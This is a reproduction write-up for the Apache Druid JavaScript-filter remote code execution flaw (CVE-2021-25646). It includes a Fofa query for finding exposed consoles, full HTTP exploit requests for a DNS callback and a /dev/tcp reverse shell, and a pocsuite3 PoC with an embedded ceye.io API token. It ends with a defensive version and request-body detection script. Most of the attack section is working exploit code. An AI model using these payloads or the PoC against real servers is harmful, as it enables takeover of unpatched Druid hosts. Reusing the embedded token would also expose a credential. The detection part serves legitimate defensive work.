Apache Druid Console remote command execution vulnerability (CVE-2021-25646)
1. Vulnerability overview
Apache Druid is an open-source, column-oriented distributed data store written in Java. It is designed to ingest large volumes of event data quickly and to serve low-latency queries on top of that data.
By default Apache Druid ships without authentication or authorization. An attacker who can reach the console or router port can send a specially crafted request and execute arbitrary code with the privileges of the Druid server process.
Apache Druid includes the ability to execute user-provided JavaScript embedded in various kinds of requests (filters, aggregators and extraction functions). The feature is meant for high-trust environments and is disabled by default (druid.javascript.enabled=false). In Druid 0.20.0 and earlier, however, an authenticated user (or, on the default unauthenticated deployment, anyone who can reach the API) can send a crafted request that forces Druid to run the supplied JavaScript regardless of the server configuration: the request carries a JavaScript filter together with an extra property named "" whose value is {"enabled": true}. That empty-name property overrides the JavaScriptConfig that the server injects into the filter during JSON deserialization, so execution is re-enabled for that single request. Because the JavaScript runs inside the JVM, java.lang.Runtime.getRuntime().exec() turns this into arbitrary command execution on the host.
2. Affected versions
Affected versions:
Apache Druid < 0.20.1
Fixed version:
Apache Druid 0.20.1
3. Reproduction
Fofa keyword:
body="Apache Druid console"
Payload (DNS callback variant; replace xxxx.dnslog.cn with your own DNSlog domain):
POST /druid/indexer/v1/sampler HTTP/1.1
Content-Type: application/json
User-Agent: Java/1.8.0_211
Host: 192.168.1.198:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1005

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://www.baidu.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": "true"}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxx.dnslog.cn')}", "": {"enabled": "true"}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

DNSlog result (screenshot from the original post, not reproduced here):

Reverse-shell variant (the listener address and port are the ones used in the original test setup):
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.1.198:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1048
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.1.198/23333 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

Note on the command string: Runtime.exec() splits its argument on whitespace instead of handing it to a shell, so a one-liner containing pipes and redirections cannot be passed directly. The "bash -c $@|bash 0 echo ..." form works around that splitting by feeding the real command to bash through the positional parameters.

A pocsuite3 PoC was written for this vulnerability:
#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import time
import random
import string


class TestPOC(POCBase):
    vulID = '58'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-02'
    createDate = '2021-02-03'
    updateDate = '2021-02-03'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'Apache Druid remote code execution vulnerability (CVE-2021-25646)'
    appName = 'Druid'
    appVersion = '< 0.20.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''Apache Druid includes the ability to execute user-provided JavaScript embedded in various
    kinds of requests. The feature is meant for high-trust environments and is disabled by default.
    In Druid 0.20.0 and earlier, however, an authenticated user can send a malicious request that
    executes arbitrary code. An attacker can craft such a request directly and take control of the server.'''

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            # Druid router/console default port (the original PoC had 9200 here,
            # which is Elasticsearch's port; it only affects the reported target).
            ports = [8888]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            TIMEOUT = 10
            # Sampler request with a JavaScript filter; the "" : {"enabled": "true"}
            # property re-enables JavaScript for this request. RECOMMAND is replaced
            # with the command to run.
            payload = r'''{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": "true"}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('RECOMMAND')}", "": {"enabled": "true"}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'''
            # Random label so the DNS callback can be matched to this run.
            st = ''.join(random.choices(string.ascii_letters, k=8))
            cmd = "ping " + st + ".6eb4yw.ceye.io"
            path = "/druid/indexer/v1/sampler"
            headers = {
                'Content-Type': 'application/json',
                'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
                'Connection': 'keep-alive',
            }
            data = payload.replace("RECOMMAND", cmd)
            try:
                self.request = req.post(self.url + path, data=data, headers=headers,
                                        timeout=TIMEOUT, verify=False)
                time.sleep(1)
                # Check the ceye.io DNS log for the random label.
                request = req.get("http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns")
                if st in request.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target
                    result['VerifyInfo']['CMD'] = cmd
                    break
            except Exception as e:
                pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)
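The PoC above only tells you whether a callback arrived. As an added defensive counterpart (example code written for this page, not part of the original write-up, of vulmap or of Druid), the script below implements the two checks a blue team would want for this issue: deciding from the JSON that Druid's GET /status endpoint returns whether a build predates the 0.20.1 fix, and walking a sampler or ingest request body to report every {"type": "javascript"} object, together with whether it carries the "" : {"enabled": true} override seen in the payloads above. The sample status responses and request bodies are constructed inline; the function names and the 8-character structure of the walk are this example's own.

```python
import json
import re

# Added example: defensive checks for CVE-2021-25646.
#  1. version_is_vulnerable(): parse the body of GET /status and compare the
#     reported version against the fixed release 0.20.1.
#  2. find_javascript_exec(): walk a request body (sampler, ingest spec, query)
#     and report every object of type "javascript", noting whether it also
#     tries to force-enable JavaScript through the empty-name "" property.

FIXED_VERSION = (0, 20, 1)


def parse_version(version):
    """'0.20.0' -> (0, 20, 0); suffixes such as '-incubating' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised Druid version: %r" % version)
    return tuple(int(x) for x in m.groups())


def version_is_vulnerable(status_json):
    """status_json: body of GET /status, a JSON object with a 'version' key."""
    info = json.loads(status_json)
    return parse_version(info["version"]) < FIXED_VERSION


def _walk(node, path, hits):
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            override = node.get("")
            # The exploit adds "" : {"enabled": true} next to the JavaScript
            # object to replace the server-injected (disabled) JavaScriptConfig.
            forced = isinstance(override, dict) and str(override.get("enabled")).lower() == "true"
            hits.append({"path": path, "function": node.get("function"), "config_override": forced})
        for k, v in node.items():
            _walk(v, path + "/" + (k or '""'), hits)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            _walk(v, "%s[%d]" % (path, i), hits)


def find_javascript_exec(body):
    """Return every JavaScript object found anywhere in a JSON request body.

    Each hit records the JSON path, the function source and whether the
    object also carries the "" config override.
    """
    hits = []
    _walk(json.loads(body), "", hits)
    return hits


# --- constructed sample inputs (not captured from a real system) ---

STATUS_OLD = '{"version": "0.20.0", "modules": [], "memory": {}}'
STATUS_FIXED = '{"version": "0.20.1", "modules": [], "memory": {}}'

BENIGN_SAMPLER = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"ts\":\"2021-01-01\"}"}},
        "dataSchema": {"dataSource": "s", "timestampSpec": {"column": "ts", "format": "iso"},
                       "transformSpec": {"filter": {"type": "selector", "dimension": "added", "value": "1"}}},
    },
    "samplerConfig": {"numRows": 10},
})

EXPLOIT_SAMPLER = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"ts\":\"2021-01-01\"}"}},
        "dataSchema": {"dataSource": "s", "timestampSpec": {"column": "ts", "format": "iso"},
                       "transformSpec": {"filter": {
                           "type": "javascript", "dimension": "added",
                           "function": "function(value) {java.lang.Runtime.getRuntime().exec('id')}",
                           "": {"enabled": "true"}}}},
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})


if __name__ == "__main__":
    print("0.20.0 vulnerable:", version_is_vulnerable(STATUS_OLD))
    print("0.20.1 vulnerable:", version_is_vulnerable(STATUS_FIXED))
    for hit in find_javascript_exec(EXPLOIT_SAMPLER):
        print("javascript object at", hit["path"], "config override:", hit["config_override"])
```

Any JavaScript object in a request to a Druid cluster where druid.javascript.enabled is false is already suspicious; the config_override flag singles out the bypass itself, which is the signature worth alerting on in router or WAF logs. The version check is only a first filter: a 0.20.1 build with JavaScript deliberately enabled still executes whatever function a request carries, so the request-body check applies there as well.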